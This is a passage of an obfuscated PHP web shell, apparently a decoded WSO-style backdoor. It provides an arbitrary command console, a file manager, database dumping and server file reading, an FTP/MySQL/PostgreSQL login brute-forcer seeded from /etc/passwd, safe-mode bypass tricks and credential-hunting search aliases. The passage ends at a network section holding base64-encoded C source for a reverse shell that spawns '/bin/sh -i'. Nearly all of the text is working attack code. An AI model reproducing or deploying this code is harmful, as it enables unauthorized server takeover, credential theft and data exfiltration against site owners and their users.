files" => "locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv"); } goto Oda8Q; oh1bD: function hardHeader() { if (empty($_POST["charset"])) { $_POST["charset"] = $GLOBALS["\xe2\226\x9c"]; } echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST["charset"] . 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\x9\x9	\x9var arr=reg.exec(req.responseText);\xa\x9\x9	\x9eval(arr[2].substr(0, arr[1])); 
\x9\x9	} else alert('Request error!'); 
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</form>"; $freeSpace = @diskfreespace($GLOBALS["cwd"]); $totalSpace = @disk_total_space($GLOBALS["cwd"]); $totalSpace = $totalSpace ? $totalSpace : 1; $release = @php_uname("r"); $kernel = @php_uname("s"); $explink = ""; if (strpos("Linux", $kernel) !== false) { $explink .= urlencode("Linux Kernel " . substr($release, 0, 6)); } else { $explink .= urlencode($kernel . " " . substr($release, 0, 3)); } if (!function_exists("posix_getegid")) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(@posix_geteuid()); $gid = @posix_getgrgid(@posix_getegid()); $user = $uid["name"]; $uid = $uid["uid"]; $group = $gid["name"]; $gid = $gid["gid"]; } $cwd_links = ''; $path = explode("/", $GLOBALS["cwd"]); $n = count($path); for ($i = 0; $i < $n - 1; $i++) { $cwd_links .= "<a href='#' onclick='g("FilesMan",""; for ($j = 0; $j <= $i; $j++) { $cwd_links .= $path[$j] . "/"; } $cwd_links .= "")'>" . $path[$i] . "/</a>"; } $charsets = array("UTF-8", "Windows-1251", "KOI8-R", "KOI8-U", "cp866"); $opt_charsets = ''; foreach ($charsets as $) { $opt_charsets .= "<option value="" . $ . "" " . ($_POST["charset"] == $ ? "selected" : '') . ">" . $ . "</option>"; } $m = array("Sec. Info" => "SecInfo", "Files" => "FilesMan", "Console" => "Console", "Infect" => "Infect", "Sql" => "Sql", "Php" => "Php", "Safe mode" => "SafeMode", "String tools" => "StringTools", "Bruteforce" => "Bruteforce", "Network" => "Network"); if (!empty($GLOBALS["\xe2\226\x9b"])) { $m["Logout"] = "Logout"; } $m["Self remove"] = "SelfRemove"; $menu = ''; foreach ($m as $k => $v) { $menu .= "<th>[ <a href="#" onclick="g('" . $v . "',null,'','','')">" . $k . "</a> ]</th>"; } $drives = ''; if ($GLOBALS["os"] == "win") { foreach (range("c", "z") as $drive) { if (is_dir($drive . ":\")) { $drives .= "<a href="#" onclick="g('FilesMan','" . $drive . ":/')">[ " . $drive . " ]</a> "; } } } echo "<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:" . ($GLOBALS["os"] == "win" ? "<br>Drives:" : '') . "</span></td>" . "<td><nobr>" . substr(@php_uname(), 0, 120) . " <a href="" . urlencode(@php_uname()) . "" target="_blank">[ Google ]</a> <a href="" . $explink . "" target=_blank>[ Exploit-DB ]</a></nobr><br>" . $uid . " ( " . $user . " ) <span>Group:</span> " . $gid . " ( " . $group . " )<br>" . @phpversion() . " <span>Safe mode:</span> " . ($GLOBALS["safe_mode"] ? "<font color=#a10705>ON</font>" : "<font color=#f9c440><b>OFF</b></font>") . " <a href=# onclick="g('Php',null,null,'info')">[ phpinfo ]</a> <span>Datetime:</span> " . date("Y-m-d H:i:s") . "<br>" . viewSize($totalSpace) . " <span>Free:</span> " . viewSize($freeSpace) . " (" . round(100 / ($totalSpace / $freeSpace), 2) . "%)<br>" . $cwd_links . " " . viewPermsColor($GLOBALS["cwd"]) . " <a href=# onclick="g('FilesMan','" . $GLOBALS["home_cwd"] . "','','','')">[ home ]</a><br>" . $drives . "</td>" . "<td width=1 align=right><nobr><label><select onchange="g(null,null,null,null,null,this.value)">" . $opt_charsets . "</select></label><br><span>Server IP:</span><br>" . gethostbyname($_SERVER["HTTP_HOST"]) . "<br><span>Client IP:</span><br>" . $_SERVER["REMOTE_ADDR"] . "</nobr></td></tr></table>" . "<table style="background-color:#0d52bf;" cellpadding=3 cellspacing=0 width=100%><tr>" . $menu . "</tr></table><div>"; } goto OWR26; rGxXC: function actionSql() { class DbClass { var $type; var $link; var $res; function __construct($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname) { switch ($this->type) { case "mysql": if ($this->link = @mysql_connect($host, $user, $pass, true)) { return true; } break; case "pgsql": $host = explode(":", $host); if (!$host[1]) { $host[1] = 5432; } if ($this->link = @pg_connect("host={$host[0]} port={$host[1]} user={$user} password={$pass} dbname={$dbname}")) { return true; } break; } return false; } function selectdb($db) { switch ($this->type) { case "mysql": if (@mysql_select_db($db)) { return true; } break; } return false; } function query($str) { switch ($this->type) { case "mysql": return $this->res = @mysql_query($str); break; case "pgsql": return $this->res = @pg_query($this->link, $str); break; } return false; } function fetch() { $res = func_num_args() ? func_get_arg(0) : $this->res; switch ($this->type) { case "mysql": return @mysql_fetch_assoc($res); break; case "pgsql": return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch ($this->type) { case "mysql": return $this->query("SHOW databases"); break; case "pgsql": return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch ($this->type) { case "mysql": return $this->res = $this->query("SHOW TABLES"); break; case "pgsql": return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch ($this->type) { case "mysql": return @mysql_error(); break; case "pgsql": return @pg_last_error(); break; } return false; } function setCharset($str) { switch ($this->type) { case "mysql": if (function_exists("mysql_set_charset")) { return @mysql_set_charset($str, $this->link); } else { $this->query("SET CHARSET " . $str); } break; case "pgsql": return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch ($this->type) { case "mysql": return $this->fetch($this->query("SELECT LOAD_FILE('" . addslashes($str) . "') as file")); break; case "pgsql": $this->query("CREATE TABLE hard2(file text);COPY hard2 FROM '" . addslashes($str) . "';select file from hard2;"); $r = array(); while ($i = $this->fetch()) { $r[] = $i["file"]; } $this->query("drop table hard2"); return array("file" => implode("\xa", $r)); break; } return false; } function dump($table, $fp = false) { switch ($this->type) { case "mysql": $res = $this->query("SHOW CREATE TABLE `" . $table . "`"); $create = mysql_fetch_array($res); $sql = $create[1] . "; 
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $this->query("SELECT * FROM `" . $table . "`"); $i = 0; $head = true; while ($ = $this->fetch()) { $sql = ''; if ($i % 1000 == 0) { $head = true; $sql = ";\xa\xa"; } $columns = array(); foreach ($ as $k => $v) { if ($v === null) { $[$k] = "NULL"; } elseif (is_int($v)) { $[$k] = $v; } else { $[$k] = "'" . @mysql_real_escape_string($v) . "'"; } $columns[] = "`" . $k . "`"; } if ($head) { $sql .= "INSERT INTO `" . $table . "` (" . implode(", ", $columns) . ") VALUES \xa	(" . implode(", ", $) . ")"; $head = false; } else { $sql .= "\xa\x9,(" . implode(", ", $) . ")"; } if ($fp) { fwrite($fp, $sql); } else { echo $sql; } $i++; } if (!$head) { if ($fp) { fwrite($fp, "; 
"); } else { echo "; 
"; } } break; case "pgsql": $this->query("SELECT * FROM " . $table); while ($ = $this->fetch()) { $columns = array(); foreach ($ as $k => $v) { $[$k] = "'" . addslashes($v) . "'"; $columns[] = $k; } $sql = "INSERT INTO " . $table . " (" . implode(", ", $columns) . ") VALUES (" . implode(", ", $) . ");" . " 
"; if ($fp) { fwrite($fp, $sql); } else { echo $sql; } } break; } return false; } } $db = new DbClass($_POST["type"]); if (@$_POST["p2"] == "download" && @$_POST["p1"] != "select") { $db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"]); $db->selectdb($_POST["sql_base"]); switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } if (empty($_POST["file"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach ($_POST["tbl"] as $v) { $db->dump($v); } die; } elseif ($fp = @fopen($_POST["file"], "w")) { foreach ($_POST["tbl"] as $v) { $db->dump($v, $fp); } fclose($fp); unset($_POST["p2"]); } else { die("<script>alert("Error! Can't open file");window.history.back(-1)</script>"); } } hardHeader(); echo " 
<h1>Sql browser</h1><div class=content>\xa<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\xa<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr> 
<input type=hidden name=ne value=''><input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS["cwd"]) . "'><input type=hidden name=charset value='" . (isset($_POST["charset"]) ? $_POST["charset"] : '') . "'>\xa<td><label><select name='type'><option value='mysql' "; if (@$_POST["type"] == "mysql") { echo "selected"; } echo ">MySql</option><option value='pgsql' "; if (@$_POST["type"] == "pgsql") { echo "selected"; } echo ">PostgreSql</option></select></label></td>\xa<td><input type=text name=sql_host value="" . (empty($_POST["sql_host"]) ? "localhost" : htmlspecialchars($_POST["sql_host"])) . ""></td>\xa<td><input type=text name=sql_login value="" . (empty($_POST["sql_login"]) ? "root" : htmlspecialchars($_POST["sql_login"])) . ""></td>\xa<td><input type=text name=sql_pass value="" . (empty($_POST["sql_pass"]) ? '' : htmlspecialchars($_POST["sql_pass"])) . "" required></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if (isset($_POST["sql_host"])) { if ($db->connect($_POST["sql_host"], $_POST["sql_login"], $_POST["sql_pass"], $_POST["sql_base"])) { switch ($_POST["charset"]) { case "Windows-1251": $db->setCharset("cp1251"); break; case "UTF-8": $db->setCharset("utf8"); break; case "KOI8-R": $db->setCharset("koi8r"); break; case "KOI8-U": $db->setCharset("koi8u"); break; case "cp866": $db->setCharset("cp866"); break; } $db->listDbs(); echo "<label><select name=sql_base><option value=''></option>"; while ($ = $db->fetch()) { list($key, $value) = each($); echo "<option value="" . $value . "" " . ($value == $_POST["sql_base"] ? "selected" : '') . ">" . $value . "</option>"; } echo "</select></label>"; } else { echo $tmp; } } else { echo $tmp; } echo "</td> 
		\x9\x9<td><input type=submit value='submit' onclick='fs(d.sf);'></td> 
                <td><input type=checkbox name=sql_count value='on'" . (empty($_POST["sql_count"]) ? '' : " checked") . "> count the number of rows</td>\xa\x9	\x9</tr>\xa		</table>\xa	\x9<script>\xa            s_db='" . @addslashes($_POST["sql_base"]) . "'; 
            function fs(f) { 
                if(f.sql_base.value!=s_db) { f.onsubmit = function() {};\xa                    if(f.p1) f.p1.value=''; 
                    if(f.p2) f.p2.value=''; 
                    if(f.p3) f.p3.value=''; 
\x9	\x9function st(t,l) { 
\x9			d.sf.p1.value = 'select'; 
	\x9	\x9d.sf.p2.value = t;\xa                if(l && d.sf.p3) d.sf.p3.value = l; 
	\x9		d.sf.submit();\xa\x9\x9\x9} 
\x9	\x9function is() {\xa\x9\x9	\x9for(i=0;i<d.sf.elements['tbl[]'].length;++i)\xa	\x9	\x9	d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;\xa\x9\x9\x9}\xa		</script>"; if (isset($db) && $db->link) { echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if (!empty($_POST["sql_base"])) { $db->selectdb($_POST["sql_base"]); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while ($ = $db->fetch($tbls_res)) { list($key, $value) = each($); if (!empty($_POST["sql_count"])) { $n = $db->fetch($db->query("SELECT COUNT(*) as n FROM " . $value . '')); } $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'>&nbsp;<a href=# onclick="st('" . $value . "',1)">" . $value . "</a>" . (empty($_POST["sql_count"]) ? "&nbsp;" : " <small>({$n["n"]})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=submit value='Dump' onclick='document.sf.p2.value="download";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if (@$_POST["p1"] == "select") { $_POST["p1"] = "query"; $_POST["p3"] = $_POST["p3"] ? $_POST["p3"] : 1; $db->query("SELECT COUNT(*) as n FROM " . $_POST["p2"]); $num = $db->fetch(); $pages = ceil($num["n"] / 30); echo "<script>d.sf.onsubmit=function(){st("" . $_POST["p2"] . "", d.sf.p3.value)}</script><span>" . $_POST["p2"] . "</span> ({$num["n"]} records) Page # <input type=text name='p3' value=" . (int) $_POST["p3"] . ">"; echo " of {$pages}"; if ($_POST["p3"] > 1) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] - 1) . ")'>&lt; Prev</a>"; } if ($_POST["p3"] < $pages) { echo " <a href=# onclick='st("" . $_POST["p2"] . "", " . ($_POST["p3"] + 1) . ")'>Next &gt;</a>"; } $_POST["p3"]--; if ($_POST["type"] == "pgsql") { $_POST["p2"] = "SELECT * FROM " . $_POST["p2"] . " LIMIT 30 OFFSET " . $_POST["p3"] * 30; } else { $_POST["p2"] = "SELECT * FROM `" . $_POST["p2"] . "` LIMIT " . $_POST["p3"] * 30 . ",30"; } echo "<br><br>"; } if (@$_POST["p1"] == "query" && !empty($_POST["p2"])) { $db->query(@$_POST["p2"]); if ($db->res !== false) { $title = false; echo "<table width=100% cellspacing=1 cellpadding=2 class=main>"; $line = 1; while ($ = $db->fetch()) { if (!$title) { echo "<tr>"; foreach ($ as $key => $value) { echo "<th>" . $key . "</th>"; } reset($); $title = true; echo "</tr><tr>"; $line = 2; } echo "<tr class="l" . $line . "">"; $line = $line == 1 ? 2 : 1; foreach ($ as $key => $value) { if ($value == null) { echo "<td><i>null</i></td>"; } else { echo "<td>" . nl2br(htmlspecialchars($value)) . "</td>"; } } echo "</tr>"; } echo "</table>"; } else { echo "<div><b>Error:</b> " . htmlspecialchars($db->error()) . "</div>"; } } echo "<br></form><form onsubmit='d.sf.p1.value="query";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if (!empty($_POST["p2"]) && $_POST["p1"] != "loadfile") { echo htmlspecialchars($_POST["p2"]); } echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if ($_POST["type"] == "mysql") { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value="loadfile";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='submit'></form>"; } } if (@$_POST["p1"] == "loadfile") { $file = $db->loadFile($_POST["p2"]); echo "<br/><pre class=ml1>" . htmlspecialchars($file["file"]) . "</pre>"; } } else { echo htmlspecialchars($db->error()); } echo "</div>"; hardFooter(); } goto et3or; hwJg4: @ini_set("log_errors", 0); goto gkT1m; WJp40: $home_cwd = @getcwd(); goto YIyjV; G6Uv3:  ?>

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/* Decoded by */

 goto r3B2Y; Oda8Q: function actionConsole() { if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } if (isset($_POST["ajax"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); echo "'';
"; $temp = @iconv($_POST["charset"], "UTF-8", addcslashes("
$ " . $_POST["p1"] . "
" . ex($_POST["p1"]), "
\xd\x9\'\0")); if (preg_match("!.*cd\s+([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } echo "'" . $temp . "';"; echo " =;"; $temp = ob_get_clean(); echo strlen($temp), "
", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } hardHeader(); echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);\xavar cmds = new Array('');
var cur = 0;
function kp(e) {
\x9var n = (window.Event) ? e.which : e.keyCode;
\x9if(n == 38) {
	\x9cur--;\xa	\x9if(cur>=0)
\x9\x9 = cmds[cur];\xa	\x9else\xa\x9\x9\x9cur++;\xa	} else if(n == 40) {\xa	\x9cur++;\xa\x9	if(cur < cmds.length)\xa\x9 = cmds[cur];
function add(cmd) {\xa\x9cmds.pop();\xa	cmds.push(cmd);
\x9cmds.push('');\xa\x9cur = cmds.length-1;\xa}
</script>"; echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if('clear'){'';'';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><label><select name=alias>"; foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } echo "</select></label><input type=button onclick="add(;if({a(null,null,,'');}else{g(null,null,,'');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>"; if (!empty($_POST["p1"])) { echo htmlspecialchars("$ " . $_POST["p1"] . "\xa" . ex($_POST["p1"])); } echo "</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; echo "</form></div><script>;</script>"; hardFooter(); } goto xWgYK; asFIH: function actionSelfRemove() { if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } if ($_POST["p1"] != "yes") { hardHeader(); } echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>"; hardFooter(); } goto eHsyk; gS860: function perms($p) { if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto y4kgJ; f9sl9: function actionBruteforce() { hardHeader(); if (isset($_POST["proto"])) { echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; if ($_POST["proto"] == "ftp") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["proto"] == "mysql") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . ":" . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["proto"] == "pgsql") { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST["server"]); if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } if (@$_POST["reverse"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } } } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } } } } echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; } echo "<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<input type=hidden name=ne  value="">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value=""></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>" . "<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>" . "<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>"; echo "</div>"; hardFooter(); } goto rGxXC; Xbodc: if (!function_exists("get_magic_quotes_gpc") || get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map("stripslashes_array", $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } goto p17RR; gaKKg: function actionSafeMode() { $temp = ''; ob_start(); switch ($_POST["p1"]) { case 1: $temp = @tempnam($test, "cx"); if (@copy("compress.zlib://" . $_POST["p2"], $temp)) { echo @file_get_contents($temp); unlink($temp); } else { echo "Sorry... Can't open file"; } break; case 2: $files = glob($_POST["p2"] . "*"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . "\xa"; } } break; case 3: $ch = curl_init("file://" . $_POST["p2"] . "\0" . SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include $_POST["p2"]; break; case 5: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { echo join(":", $uid) . "\xa"; } } break; case 6: if (!function_exists("imap_open")) { break; } $stream = imap_open($_POST["p2"], '', ''); if ($stream == FALSE) { break; } echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo "<h1>Safe mode bypass</h1><div class=content>"; echo "<span>Copy (read file)</span><form onsubmit='g(null,null,"1",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit='g(null,null,"2",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit='g(null,null,"3",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit='g(null,null,"4",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit='g(null,null,"6",this.param.value);return false;'><input type=text name=param><input type=submit value="submit"></form>"; if ($temp) { echo "<pre class="ml1" style="margin-top:5px" id="Output">" . $temp . "</pre>"; } echo "</div>"; hardFooter(); } goto urnx6; ZjyZB: if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) { call_user_func("action" . $_POST["a"]); } goto G6Uv3; R8xcz: function decrypt($str, $pwd) { $pwd = base64_encode($pwd); $str = base64_decode($str); $enc_chr = ''; $enc_str = ''; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return base64_decode($enc_str); } goto w0nra; wlqmv: $cwd = @getcwd(); goto vmP50; nbi9R: function viewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto gS860; KGlJ0: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto JCS_A; qDiW5: $ = "FilesMan"; goto WeQHr; xxz2n: if (!$safe_mode) { error_reporting(0); } goto E3hGz; w0nra: @ini_set("error_log", NULL); goto hwJg4; BKw4L: if (version_compare(PHP_VERSION, "5.3.0", "<")) { set_magic_quotes_runtime(0); } goto IjCwH; E3hGz: $disable_functions = @ini_get("disable_functions"); goto WJp40; w9TDR: function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto uwRUw; B0PbS: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $; } goto PtFVC; UOKiC: if (empty($_POST["charset"])) { $_POST["charset"] = $; } goto FVur6; et3or: function actionNetwork() { hardHeader(); $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p = 